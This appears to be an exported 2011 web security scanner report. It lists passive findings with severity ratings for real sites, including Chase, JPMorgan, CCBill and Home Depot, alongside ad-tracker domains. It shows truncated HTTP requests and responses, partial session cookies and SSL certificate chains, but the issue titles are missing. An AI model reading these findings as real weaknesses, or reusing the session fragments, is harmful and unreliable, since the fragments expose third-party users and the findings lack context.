GET /LocatorAction.do Host: locator.chase.com Connection: keep-alive Referer: https://locator.chase.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:09:02 GMT Server: Apache Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 43237 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://locator.chase.com |
Path: | /LocatorAction.do |
GET /LocatorAction.do Host: locator.chase.com Connection: keep-alive Referer: https://locator.chase.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:09:02 GMT Server: Apache Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 43237 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="https://www.chase <img src="/images/logo107x20 </a> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://locator.chase.com |
Path: | /images/logo107x20.gif |
GET /images/logo107x20.gif Host: locator.chase.com Connection: keep-alive Referer: https://locator.chase.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:09:08 GMT Server: Apache P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' ETag: W/"1983-1310075674000" Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 1983 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif;charset=ISO GIF89ak............... ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://locator.chase.com |
Path: | /jsp/SearchPage.jsp |
GET /jsp/SearchPage.jsp HTTP/1.1 Host: locator.chase.com Connection: keep-alive Referer: https://locator.chase.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:09:44 GMT Server: Apache Set-Cookie: JSESSIONID=E6E7F423B Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 43237 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="https://www.chase <img src="/images/logo107x20 </a> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://maps.googleapis |
Path: | /maps/api/js/Authent |
GET /maps/api/js/Authent Host: maps.googleapis.com Proxy-Connection: keep-alive Referer: http://www.akqa.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Tue, 12 Jul 2011 15:33:06 GMT Server: mafe Cache-Control: private Content-Length: 37 X-XSS-Protection: 1; mode=block _xdc_._txgsed && _xdc_._txgsed( [1] ) |
Severity: | Medium |
Confidence: | Certain |
Host: | https://store.popcap.com |
Path: | / |
Issued to: | store.popcap.com |
Issued by: | DigiCert High Assurance EV CA-1 |
Valid from: | Thu Sep 02 19:00:00 CDT 2010 |
Valid to: | Sun Nov 06 17:59:59 CST 2011 |
Issued to: | DigiCert High Assurance EV CA-1 |
Issued by: | DigiCert High Assurance EV Root CA |
Valid from: | Thu Nov 09 18:00:00 CST 2006 |
Valid to: | Tue Nov 09 18:00:00 CST 2021 |
Issued to: | DigiCert High Assurance EV Root CA |
Issued by: | Entrust.net Secure Server Certification Authority |
Valid from: | Sun Oct 01 00:00:00 CDT 2006 |
Valid to: | Sat Jul 26 13:15:15 CDT 2014 |
Issued to: | Entrust.net Secure Server Certification Authority |
Issued by: | Entrust.net Secure Server Certification Authority |
Valid from: | Tue May 25 11:09:40 CDT 1999 |
Valid to: | Sat May 25 11:39:40 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | / |
Issued to: | admin.ccbill.com |
Issued by: | Thawte SSL CA |
Valid from: | Tue Dec 07 18:00:00 CST 2010 |
Valid to: | Thu Jan 12 17:59:59 CST 2012 |
Issued to: | Thawte SSL CA |
Issued by: | thawte Primary Root CA |
Valid from: | Sun Feb 07 18:00:00 CST 2010 |
Valid to: | Fri Feb 07 17:59:59 CST 2020 |
Issued to: | thawte Primary Root CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Thu Nov 16 18:00:00 CST 2006 |
Valid to: | Wed Dec 30 17:59:59 CST 2020 |
Issued to: | Thawte Premium Server CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Wed Jul 31 19:00:00 CDT 1996 |
Valid to: | Fri Jan 01 17:59:59 CST 2021 |
Severity: | Information |
Confidence: | Certain |
Host: | https://affiliateadmin |
Path: | / |
Issued to: | affiliateadmin.ccbill.com |
Issued by: | Thawte SSL CA |
Valid from: | Sun Dec 05 18:00:00 CST 2010 |
Valid to: | Thu Dec 15 17:59:59 CST 2011 |
Issued to: | Thawte SSL CA |
Issued by: | thawte Primary Root CA |
Valid from: | Sun Feb 07 18:00:00 CST 2010 |
Valid to: | Fri Feb 07 17:59:59 CST 2020 |
Issued to: | thawte Primary Root CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Thu Nov 16 18:00:00 CST 2006 |
Valid to: | Wed Dec 30 17:59:59 CST 2020 |
Issued to: | Thawte Premium Server CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Wed Jul 31 19:00:00 CDT 1996 |
Valid to: | Fri Jan 01 17:59:59 CST 2021 |
Severity: | Information |
Confidence: | Certain |
Host: | https://bill.ccbill.com |
Path: | / |
Issued to: | bill.ccbill.com |
Issued by: | Thawte SSL CA |
Valid from: | Tue Dec 07 18:00:00 CST 2010 |
Valid to: | Thu Jan 19 17:59:59 CST 2012 |
Issued to: | Thawte SSL CA |
Issued by: | thawte Primary Root CA |
Valid from: | Sun Feb 07 18:00:00 CST 2010 |
Valid to: | Fri Feb 07 17:59:59 CST 2020 |
Issued to: | thawte Primary Root CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Thu Nov 16 18:00:00 CST 2006 |
Valid to: | Wed Dec 30 17:59:59 CST 2020 |
Issued to: | Thawte Premium Server CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Wed Jul 31 19:00:00 CDT 1996 |
Valid to: | Fri Jan 01 17:59:59 CST 2021 |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.ccbill |
Path: | / |
Issued to: | support.ccbill.com |
Issued by: | Thawte SSL CA |
Valid from: | Sun Aug 15 19:00:00 CDT 2010 |
Valid to: | Tue Aug 23 18:59:59 CDT 2011 |
Issued to: | Thawte SSL CA |
Issued by: | thawte Primary Root CA |
Valid from: | Sun Feb 07 18:00:00 CST 2010 |
Valid to: | Fri Feb 07 17:59:59 CST 2020 |
Issued to: | thawte Primary Root CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Thu Nov 16 18:00:00 CST 2006 |
Valid to: | Wed Dec 30 17:59:59 CST 2020 |
Issued to: | Thawte Premium Server CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Wed Jul 31 19:00:00 CDT 1996 |
Valid to: | Fri Jan 01 17:59:59 CST 2021 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.ccbill.com |
Path: | / |
Issued to: | www.ccbill.com |
Issued by: | Thawte SSL CA |
Valid from: | Tue Jul 27 19:00:00 CDT 2010 |
Valid to: | Thu Aug 04 18:59:59 CDT 2011 |
Issued to: | Thawte SSL CA |
Issued by: | thawte Primary Root CA |
Valid from: | Sun Feb 07 18:00:00 CST 2010 |
Valid to: | Fri Feb 07 17:59:59 CST 2020 |
Issued to: | thawte Primary Root CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Thu Nov 16 18:00:00 CST 2006 |
Valid to: | Wed Dec 30 17:59:59 CST 2020 |
Issued to: | Thawte Premium Server CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Wed Jul 31 19:00:00 CDT 1996 |
Valid to: | Fri Jan 01 17:59:59 CST 2021 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.lowes.com |
Path: | / |
Issued to: | www.lowes.com,ST=North Carolina |
Issued by: | Akamai Subordinate CA 3 |
Valid from: | Mon Sep 13 16:28:46 CDT 2010 |
Valid to: | Tue Sep 13 16:28:46 CDT 2011 |
Issued to: | Akamai Subordinate CA 3 |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Thu May 11 10:32:00 CDT 2006 |
Valid to: | Sat May 11 18:59:00 CDT 2013 |
Issued to: | GTE CyberTrust Global Root |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Wed Aug 12 19:29:00 CDT 1998 |
Valid to: | Mon Aug 13 18:59:00 CDT 2018 |
Severity: | Low |
Confidence: | Firm |
Host: | http://login.dotomi.com |
Path: | /ucm/UCMController |
GET /ucm/UCMController?dtm Host: login.dotomi.com Proxy-Connection: keep-alive Referer: http://www6.homedepot.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:53:44 GMT X-Name: dmc-o08 Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache, private P3P: "policyref="/w3c/p3p.xml" Set-Cookie: DotomiUser=330100732 Set-Cookie: DotomiSession_2339=2 Set-Cookie: DotomiNet=2$DjQqblZ1 Set-Cookie: DotomiRR2339=-1$1$1$; Domain=.dotomi.com; Expires=Wed, 13-Jul-2011 16:53:44 GMT; Path=/ Content-Type: text/html Content-Length: 1521 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html </head> <body> <script language="JavaScript" typ ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://scribe.twitter.com |
Path: | /scribe |
GET /scribe?q=0241&log%5B%5D= Host: scribe.twitter.com Proxy-Connection: keep-alive Referer: http://twitter.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=v1%3A130884 |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 01:05:44 GMT Server: hi Status: 200 OK X-Transaction: 1310519144-24311-9025 ETag: "db04c7b378cb2db912c X-Frame-Options: SAMEORIGIN Last-Modified: Wed, 13 Jul 2011 01:05:44 GMT Content-Transfer-Encoding X-Runtime: 0.01606 Content-Disposition: inline Content-Type: image/gif; charset=utf-8 Content-Length: 43 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 X-MID: b8a7614452c3d5517e8d Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7Cj Connection: close GIF89a.............!..... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.homedepot.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.homedepot.com Proxy-Connection: keep-alive Referer: http://www.homedepot.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26FCF442 |
HTTP/1.1 302 Moved Temporarily Server: IBM_HTTP_Server Surrogate-Control: no-store Location: http://www.homedepot.com Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Expires: Tue, 12 Jul 2011 16:45:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 12 Jul 2011 16:45:57 GMT Connection: close Set-Cookie: THD_PERSIST=C4%3d2583 Set-Cookie: WC_USERSESSION_295945051 |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.trafficmp.com |
Path: | /a/bpix |
GET /a/bpix?adv=598&id=255 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: nab=7; nat=1305981242875; uid2=4372bf1d7-7ad8-48eb |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-cache P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" P3P: CP="COM NAV INT STA NID OUR IND NOI" Date: Tue, 12 Jul 2011 20:39:51 GMT Pragma: no-cache Connection: close Set-Cookie: T_bmu3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: T_cure=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: T_4qye=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: T_5sus=jd9%3A2zz6e%3A1; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/ Set-Cookie: rth=2-ll8nk2-jd9~2zz6e~1 Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/www.burstnet.com |
GET /is/www.burstnet.com?U= Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://www.popcap.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-6D09C81E483 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.burstnet.com Expires: Tue, 12 Jul 2011 20:39:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 12 Jul 2011 20:39:27 GMT Connection: close Set-Cookie: 01AI=2-2-FCCFE70FC07 P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/www.imiclk.com |
GET /is/www.imiclk.com?U=/cgi Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://www.popcap.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-0F09B572DED |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.imiclk.com/cgi Expires: Tue, 12 Jul 2011 20:39:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 12 Jul 2011 20:39:27 GMT Connection: close Set-Cookie: 01AI=2-2-ADF10014E4A P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/www.lowes.com |
GET /is/www.lowes.com?U= Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://www.lowes.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-D5D9220AA35 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.lowes.com Expires: Tue, 12 Jul 2011 21:30:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 12 Jul 2011 21:30:48 GMT Connection: close Set-Cookie: 01AI=2-2-588A1646FB5 P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://akamai.mathtag.com |
Path: | /sync/img |
GET /sync/img?mt_exid=10001 Host: akamai.mathtag.com Proxy-Connection: keep-alive Referer: http://www.homedepot.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=4dd07bc8-e97b-118c |
HTTP/1.1 302 Moved Temporarily Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3a 6970 Content-Type: image/gif P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" ETag: 4dd07bc8-e97b-118c-3dec Content-Length: 43 Expires: Tue, 12 Jul 2011 16:35:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 12 Jul 2011 16:35:42 GMT Connection: close Set-Cookie: ts=1310488542; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT Set-Cookie: mt_mop=10001:1310488542 Location: http://www.homedepot.com GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://akamai.turn.com |
Path: | /r/dd/id/L21rdC85NC9 |
GET /r/dd/id/L21rdC85NC9 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: akamai.turn.com |
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Content-Type: image/gif Content-Length: 43 Expires: Tue, 12 Jul 2011 21:32:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 12 Jul 2011 21:32:12 GMT Connection: close Set-Cookie: uid=3787648658091279733; Domain=.turn.com; Expires=Sun, 08-Jan-2012 21:32:12 GMT; Path=/ Location: http://www.lowes.com GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://at.amgdgt.com |
Path: | /ads/ |
GET /ads/?t=pp&px=2762&rnd Host: at.amgdgt.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ID=AAAAAQAU0Z06Q290m |
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUcy1Eb6q7HN Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Location: http://cdn.amgdgt.com Content-Length: 0 Date: Tue, 12 Jul 2011 20:39:28 GMT |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /b |
GET /b?c1=2&c2=7518284&rn Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://blog.katango.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=64dfc632-184.84.247 |
HTTP/1.1 204 No Content Content-Length: 0 Date: Tue, 12 Jul 2011 20:46:59 GMT Connection: close Set-Cookie: UID=64dfc632-184.84.247 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |
Severity: | Information |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /bh/set.aspx |
GET /bh/set.aspx?action=add Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cr=355|1|-8588954932 |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1.1 CW-Server: cw-web81 Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 06-Jul-2012 21:30:51 GMT; Path=/ Set-Cookie: cwbh1=357%3B07%2F17 Content-Type: image/gif Date: Tue, 12 Jul 2011 21:30:51 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://bstats.adbrite.com |
Path: | /click/bstats.gif |
GET /click/bstats.gif?kid Host: bstats.adbrite.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache="168362027x0.066 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: policyref="http://files Cache-Control: no-cache, no-store, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: image/gif Set-Cookie: ut="1%3AVZJJkoQgFETv Set-Cookie: vsd=0@3@4e1cb129@www Connection: close Server: XPEHb/1.0 Accept-Ranges: none Date: Tue, 12 Jul 2011 20:40:09 GMT Content-Length: 42 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | https://iblogin.jpmorgan |
Path: | /sso/action/federateLogin |
GET /sso/action/federateLogin Host: iblogin.jpmorgan.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pajpm1-temp="Tue Jul 12 12:29:11 EDT 2011"; JSESSIONID=CE57AB5A9 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:29:17 GMT Server: Apache Set-Cookie: pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=ISO Content-Length: 10225 <SCRIPT type="text/javascript"> <!-- var cookieEnabled=(navigator //if not IE4+ nor NS6+ if (typeof navigator.cooki ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://id.google.com |
Path: | /verify/EAAAAAA8Zuvs |
GET /verify/EAAAAAA8Zuvs Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SNID=48=JlF2Ve9cr9tN |
HTTP/1.1 200 OK Set-Cookie: NID=48=JND5NXvsSmFsB Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Tue, 12 Jul 2011 20:41:01 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://id.google.com |
Path: | /verify/EAAAAB5TmvHS |
GET /verify/EAAAAB5TmvHS Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SNID=48=vgu7nJh0OOj |
HTTP/1.1 200 OK Set-Cookie: SNID=48=JlF2Ve9cr9tN Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Tue, 12 Jul 2011 20:40:09 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://id.google.com |
Path: | /verify/EAAAALupUYoU |
GET /verify/EAAAALupUYoU Host: id.google.com Proxy-Connection: keep-alive Referer: http://511.dot.ri.gov/hb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SNID=48=JlF2Ve9cr9tN |
HTTP/1.1 200 OK Set-Cookie: NID=48=G8GXu_mu Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Wed, 13 Jul 2011 00:37:19 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://idcs.interclick |
Path: | /Segment.aspx |
